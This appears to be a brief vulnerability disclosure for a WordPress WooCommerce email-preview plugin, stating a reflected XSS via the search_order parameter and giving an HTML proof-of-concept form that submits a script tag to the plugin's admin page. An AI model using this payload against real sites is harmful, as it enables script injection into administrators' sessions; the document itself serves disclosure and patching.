The plugin is vulnerable to reflected XSS via the search_order parameter found in the ~/views/form.php file.
<html>
<body>
<form action="https://[URL]/wp-admin/admin.php?page=digthis-woocommerce-preview-emails" method="POST">
<input type="hidden" name="search_order" value="<script>alert(1)</script>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>